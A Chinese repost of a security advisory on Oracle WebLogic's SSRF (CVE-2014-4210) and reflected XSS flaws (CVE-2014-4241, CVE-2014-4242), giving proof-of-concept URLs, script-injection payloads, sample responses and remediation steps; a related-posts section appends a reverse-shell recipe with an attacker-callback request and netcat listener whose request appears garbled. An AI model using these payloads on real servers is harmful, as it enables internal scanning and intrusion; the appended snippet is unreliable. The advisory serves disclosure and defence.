WebLogic SSRF 及漏洞修复

最新推荐文章于 2025-10-24 12:58:17 发布
原创 最新推荐文章于 2025-10-24 12:58:17 发布 · 3.5w 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文:https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html

SSRF漏洞,也称为XSPA(跨站端口攻击),问题存在于应用程序在加载用户提供的URL时,没能正确验证服务器的响应,然后就反馈回了客户端。攻击者可以利用该漏洞绕过访问限制(如防火墙),进而将受感染的服务器作为代理进行端口扫描,甚至访问系统中的数据。

 

CVE-2014-4210, Server Side Request Forgery in SerachPublicRegistries.jsp 版本10.0.2,10.3.6

Oracle WebLogic web server即可以被外部主机访问,同时也允许访问内部主机。比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口。

下面是一个没有服务监听TCP 23端口的例子:

 

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?
operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&
selfor=Business+location&btnSubmit=Search

 

 

响应的片断如下:

 

weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused

 

 

 

下面是一个有服务监听TCP 23端口的例子:

 

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?
operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&
selfor=Business+location&btnSubmit=Search

 

 

 

响应片断如下:

 

weblogic.uddi.client.structures.exception.XML_SoapException: 
Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.

 

 

 

可以利用这种功能来发现主机或对主机进行端口扫描。

 

CVE-2014-4241,Reflected Cross Site Scripting in SetupUDDIExploer.jsp 版本:10.0.2,10.3.6

用户输入映射到一个cookie值(有效期为1年!),这个值会以不安全的方式写入到之后的响应里,暴露给用户进行跨站脚本攻击。

恶意的URL:

 

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?
privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL

响应会为cookier变量的privateregistry设值,并把浏览器重定向到SetupUDDIExplorer.jsp页面。

 

 

HTTP/1.1 302 Moved Temporarily
Location: https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp
Set-Cookie: privateinquiryurls=<script>alert(2)</script>; expires=Saturday, 29-Nov-2014 08:00:27 GMT
Content-Length: 331
Content-Type: text/html;charset=UTF-8

重定向的请求为:

 

 

GET /uddiexplorer/SetupUDDIExplorer.jsp HTTP/1.1
Host: [vulnerablehost]
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|
http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|
http://uddi.rte.microsoft.com/inquire!Microsoft|
http://services.xmethods.net/glue/inquire/uddi!XMethods|;
 privateinquiryurls=<script>alert(2)</script>; 
privatepublishurls=http://[vulnerablehost]:8080/uddi/uddilistener;
 consumer_display=HOME_VERSION%3d1%26FORGOT_BUTTON_ROLE%3d73; 
cookie_check=yes; LANG=en_US%3BUS; navlns=0.0;

那么响应的片断为(响应中包含了cookie值:privateinquiryurls):

 

 

<td valign=top width=1%></td>
<td valign=top width=70%>
  <p>
  <h2>Private Registry:</h2>
  <h3>Search URL: <b><script>alert(1)</script></b></h3>
  <H3>Publish URL: <b>http://[vulnerablehost]:8080/uddi/uddilistener</b></h3>
  </p>

 

 

 

这类URL的例子:

 

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?
privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL

 

 

 

 

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?
privateregistry=<script>alert(2</script>&setPrivateRegistryPublish=Set+Publish+URL

 

 

 

 

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?
publicregistryname=test&publicregistryurl=<script>alert(2)</script>&addPublicRegistry=Add+Public+Registry+URL

 

 

 

CVE-2014-4242,Reflected Cross Site Scriping in consolejndi.portal 版本:10.0.2,10.3.6,12.1.1,12.1.2.0.0

控制台应用试图去管理Weblogic 应用服务器,正常是不被暴露的,它的攻击目标是管理员。

 

这一类URL的例子1:

 

http://[vulnerablehost]:7001/console/consolejndi.portal?
_pageLabel=JNDIContextPageGeneral&_nfpb=true&JNDIContextPortlethandle=
com.bea.console.handles.JndiContextHandle("<script>alert(1)</script>")

 

 

 

响应片断:

 

<div class="contenttable"><div class="introText">
<p>Listing of entries found in context <script>alert(1)</script>:</p>
</div>

 

 

 

这一类URL2的例子:

 

http://[vulnerablehost]:7001/console/consolejndi.portal?
_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//

 

 

 

响应片断:

 

<script type="text/javascript">
document.write('<div class="JSTree">');
setBaseDirectory('/console/utils/JStree/images/');
setTaxonomyDelimeter('.');
{
_a = new TreeNode('server', null, 'myserver\u0027);
alert(4)//', '/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');
alert(1)//', 'images/spacer.gif', 'images/spacer.gif', null, 'myserver\u0027);alert(4)//', false, false);

 

 

 

 

 

 

修复建议:

1.如果业务不需要UDDI功能,就关闭这个功能。可以删除uddiexporer文件夹,可以可在/weblogicPath/server/lib/uddiexplorer.war解压后,注释掉上面的jsp再打包。

2.安装oracle的更新包。http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

 

最后欢迎大家访问我的个人网站:1024s

WebLogic SSRF漏洞复现及安全防护
XvrgMatlab的博客
09-26 164
本文将详细介绍如何复现WebLogic SSRF漏洞,并提供相应的源代码示例,同时探讨针对该漏洞的安全防护措施。为了保护WebLogic服务器免受SSRF漏洞的攻击,建议采取输入验证和过滤、防火墙配置和网络隔离、更新和安全配置等安全防护措施。通过综合应用这些措施,可以有效降低WebLogic服务器受到SSRF漏洞攻击的风险,提升系统的安全性。这是一个非常简单的示例,用于说明SSRF漏洞的原理。方法中,可以实现自定义的输入验证逻辑,例如检查协议是否为HTTP或HTTPS,并限制可以访问的域名。
Weblogic SSRF漏洞复现(CVE-2014-4210)【vulhub靶场】
m0_55854679的博客
08-09 2095
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
CVE-2014-4210Weblogic SSRF漏洞复现
2401_86120759的博客
10-20 724
影响版本: weblogic 10.0.2-10.3.6版本。第二步:SSRF漏洞存在以下地址,访问判断端口是否开放。第六步:VPS设置端口监听并发送数据包获取Shell。第三步:探测内网主机存活,如果IP不存在则会返回。第四步:使用脚本进行内网主机存活探测。服务尝试将反弹Shell脚本写入。第一步:进入漏洞环境并启动环境。而IP地址存在则返回如下信息。第五步:发现内网主机。
Weblogic-SSRF漏洞复现
wodepzw的博客
12-11 577
SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:7001 我们访问的IP是内网ip地址,一般是拒绝访问的 当我们访问一个不存在的端口时,比如 http://127.0.0.1:7000 将会返回:co...
web 渗透 ——SSRF 漏洞详解:覆盖漏洞成因、利用方式,附防御全方案!(非常详细,附工具包以及学习资源包)
最新发布
zz96405784848的博客
10-24 804
SSRF(服务器端请求伪造)漏洞是指攻击者利用服务器发起恶意请求的安全漏洞。其成因是服务器未对用户提供的URL进行严格过滤,导致攻击者可通过服务器作为跳板访问内网资源或发起攻击。与CSRF不同,SSRF利用的是服务器对URL的信任问题。攻击方式包括端口扫描、应用程序攻击、Web应用指纹识别等。常见于远程资源请求、数据库功能、邮件收取等场景。防范措施包括对URL进行严格校验和限制访问范围。
我眼中的Weblogic-SSRF
ovowovo的博客
12-10 861
一、ssrf简述: SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统(正是因为他是有服务器端发起的,所以他能够请求到与他相连而与外网隔离的内部系统) 影响版本:10.0.2.0 10.3.6.0 SSRF危害以及可实现的攻击行为 主...
Weblogic ssrf
沐目的博客
07-30 2202
集训第五周 星期一~二 一.首先总结知识点: 1.ssrf: 服务端请求伪造,好像有三种利用方式,但是我目前就只会最普通的一种,利用SSRF进行端口探测,也是写这道题需要用的。有时候服务端的一个内网中有漏洞,可是我们又没有办法直接访问,所以我们就需要通过服务器,去访问服务器的内网,所以叫服务端请求伪造。有这个漏洞的条件,就是服务器端,需要有与内网传输数据的接口,要不然无法访问内网啊。通常情况下,比...
Weblogic SSRF
weixin_45653478的博客
05-15 1381
SSRF漏洞通常是由于服务端提供了从其他服务器应用获取数据的功能,并且没有对目标地址进行过滤与限制。攻击者可以利用这个漏洞,通过篡改获取资源的请求发送给服务器,服务器在没有发现这个请求是非法的情况下,会以自身的身份去访问其他服务器的资源。
Weblogic SSRF漏洞 [CVE-2014-4210]
流水不争先,争的是滔滔不绝
05-24 699
漏洞影响版本 【10.0.2 -- 10.3.6.0】
weblogicssrf漏洞修复_weblogic漏洞系列-SSRF漏洞
weixin_30923011的博客
12-31 315
0x01前言:SSRF漏洞的原理这里就不在细说了,这里主要讲解weblogicSSRF漏洞的检测办法,以及利用手段。0x02检测漏洞:image.png2.2、向服务器提交以下参数?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&bt...
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
weblogicssrf漏洞修复_Weblogic SSRF漏洞
weixin_35860326的博客
12-09 782
一、漏洞概述: Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。二、漏洞环境搭建: 1、使用docker+vulhub安装(菜没有办法)2、查看是否安装成功(注意需要访问的是7001端口)成功安装三、漏洞验证 1、验证漏洞是否存在,点击Search P...
Weblogic SSRF漏洞复现
huangyongkang666的博客
07-22 1551
Weblogic SSRF漏洞复现
weblogicssrf漏洞修复_WebLogic SSRF漏洞修复
weixin_39928993的博客
01-13 982
SSRF漏洞,也称为XSPA(跨站端口攻击),问题存在于应用程序在加载用户提供的URL时,没能正确验证服务器的响应,然后就反馈回了客户端。攻击者可以利用该漏洞绕过访问限制(如防火墙),进而将受感染的服务器作为代理进行端口扫描,甚至访问系统中的数据。CVE-2014-4210, Server Side Request Forgery in SerachPublicRegistries.jsp 版本1...
weblogicssrf漏洞修复_Weblogic-SSRF漏洞的复现
weixin_39922361的博客
12-22 488
一、环境靶机:centos7虚拟机 ip:192.168.8.11物理机:windows10burp suite二、原理SSRF原理:是指Web服务提供从用户指定的URL读取数据并展示功能又未对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息,所...
weblogicssrf漏洞修复_Weblogic-SSRF漏洞复现
weixin_39609887的博客
12-22 343
Weblogic-SSRF漏洞复现一、SSRF概念服务端请求伪造(Server-Side Request Forgery),是一种有攻击者构造形成有服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、文档...
Weblogic SSRF漏洞
热门推荐
chaojixiaojingang
01-14 1万+
1.漏洞描述 weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 2.影响版本 weblogic 10.0.2 – 10.3.6版本 3.POC http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSear...
weblogic ssrf 反弹shell
09-16
### 回答1: WebLogic SSRF 漏洞可以被滥用以执行远程代码,包括反弹 shell。下面是一种可能的方法: 1. 确保你有一台能够监听反弹 shell 的主机,并且已经在等待连接。 2. 使用 SSRF 漏洞向目标 WebLogic 服务器发送 HTTP 请求,以获取访问内部资源的权限。例如,可以使用以下请求: ``` POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1 Host: <目标 WebLogic 服务器> Content-Length: 102 weblogic.userConsoleMode=true&consoleTabId=&redirectPage=&redirectServlet=&logoutTabId=&logoutCancelTabId=&logoutSubmitTabId=&cancelTabId=&startHelpWindow=&returnToHelp=&helpWindowTitle=&helpWindowWidth=&helpWindowHeight=&helpWindowTop=&helpWindowLeft=&helpWindowStatus=&helpWindowScrollbars=&helpWindowResizable=&helpWindowMaximize=&helpWindowUri=h%74tp://<你的 IP 地址>:<监听端口>/ ``` 注意,这个请求将把 WebLogic 控制台重定向到你的主机。当 WebLogic 尝试访问你的主机时,它将尝试连接到你的监听端口,并执行任何发送的命令。 3. 等待连接,并在成功连接后执行任意命令。例如,你可以使用以下命令反弹 shell: ``` nc -lvnp <监听端口> ``` 这将在你的主机上启动一个监听器,等待从目标 WebLogic 服务器返回的反弹 shell。如果成功利用了 SSRF 漏洞,你应该会在监听器上看到一个 shell。 ### 回答2: WebLogic是一种广泛使用的Java应用服务器,但在某些版本中存在安全漏洞,其中之一是SSRF(Server-Side Request Forgery)漏洞。在此漏洞中,攻击者可以通过构造特定恶意请求,使WebLogic服务器执行非预期的请求。下面我们将讨论如何利用WebLogic SSRF漏洞来反弹shell。 首先,要利用SSRF漏洞,攻击者需要找到WebLogic应用程序中存在这个漏洞的组件。一旦找到漏洞组件,攻击者可以构造一个特定的恶意请求,将目标服务器指向一个恶意的外部URL。 接下来,攻击者需要在恶意URL中包含一个恶意的shell代码。这个shell代码可以是一段PHP、ASP或其他脚本语言,用于在远程服务器上执行命令。 当目标WebLogic服务器接收到恶意请求并执行时,它将访问恶意URL并获取恶意代码。如果成功执行,攻击者就可以在目标服务器上获得shell访问权限,从而可以执行任意命令。 为了使反弹的shell更持久和稳定,攻击者可以持续与目标服务器进行交互,并保持shell会话。这样,即使初始的SSRF漏洞请求被修补或检测到,攻击者仍然可以在以后的时间内保持对服务器的控制。 为了防止SSRF漏洞WebLogic服务器的管理员需要采取一些安全措施。这些措施包括更新到最新的WebLogic版本以修复已知的漏洞,配置严格的访问控制列表,限制对敏感资源的访问,并对来自外部的请求进行过滤和验证。 总之,利用WebLogic SSRF漏洞反弹shell是一种非法行为,违反了计算机系统的安全和隐私。我们强烈建议所有用户和管理员采取适当的安全措施来保护WebLogic服务器免受此类漏洞的攻击。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值